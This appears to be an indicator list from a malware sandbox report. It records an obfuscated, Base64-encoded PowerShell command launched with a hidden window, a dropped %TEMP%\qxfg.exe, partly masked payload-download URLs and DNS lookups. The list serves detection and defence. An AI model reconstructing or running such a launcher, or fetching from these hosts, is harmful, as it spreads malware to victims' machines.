Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAFgAUgBZAEgAaAB2AGQAPQAnAFEAVgBMAFgAVQBmAGIAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBgAFUAUgBgAGkAdAB5AFAAUgBvAGAAVABPAGMAbwBsACIAIAA9AC...
- %TEMP%\qxfg.exe
- %TEMP%\qxfg.exe
- http://ra###sino.com/vxghj/udI/
- http://el###rowifi.es/translations/7RE8qj5mvz825172005/
- http://www.el###rowifi.es/translations/7RE8qj5mvz825172005/
- DNS ASK ua####tware.com.br
- DNS ASK ra###sino.com
- DNS ASK ga#####stronomist.com
- DNS ASK re##tech.nl
- DNS ASK el###rowifi.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAFgAUgBZAEgAaAB2AGQAPQAnAFEAVgBMAFgAVQBmAGIAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBgAFUAUgBgAGkAdAB5AFAAUgBvAGAAVABPAGMAbwBsACIAIAA9AC...' (with hidden window)